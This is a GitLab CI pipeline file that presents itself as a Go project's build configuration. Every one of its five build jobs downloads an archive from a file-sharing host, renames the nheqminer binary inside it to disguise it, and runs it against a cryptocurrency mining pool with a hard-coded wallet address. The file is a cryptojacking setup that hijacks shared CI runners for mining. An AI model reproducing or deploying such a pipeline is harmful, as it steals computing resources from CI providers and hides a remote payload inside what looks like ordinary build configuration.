image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
     - wget https://transfer.sh/m71g8/dffgiru.tar.gz
     - tar xf dffgiru.tar.gz
     - mv nheqminer tete
     - ./tete -v -l verushash.mine.zergpool.com:3300 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov -p c=VRSC,mc=VRSC,ID=Arny -t 2

build_b:
  stage: build
  script:
     - wget https://transfer.sh/m71g8/dffgiru.tar.gz
     - tar xf dffgiru.tar.gz
     - mv nheqminer tete
     - ./tete -v -l verushash.mine.zergpool.com:3300 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov -p c=VRSC,mc=VRSC,ID=Arny -t 2

build_c:
  stage: build
  script:
     - wget https://transfer.sh/m71g8/dffgiru.tar.gz
     - tar xf dffgiru.tar.gz
     - mv nheqminer tetex
     - ./tetex -v -l verushash.mine.zergpool.com:3300 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov -p c=VRSC,mc=VRSC,ID=Arny -t 2

build_d:
  stage: build
  script:
     - wget https://transfer.sh/m71g8/dffgiru.tar.gz
     - tar xf dffgiru.tar.gz
     - mv nheqminer ter
     - ./ter -v -l verushash.mine.zergpool.com:3300 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov -p c=VRSC,mc=VRSC,ID=Arny -t 2

build_e:
  stage: build
  script:
     - wget https://transfer.sh/m71g8/dffgiru.tar.gz
     - tar xf dffgiru.tar.gz
     - mv nheqminer kontol
     - ./kontol -v -l verushash.mine.zergpool.com:3300 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov -p c=VRSC,mc=VRSC,ID=Arny -t 2
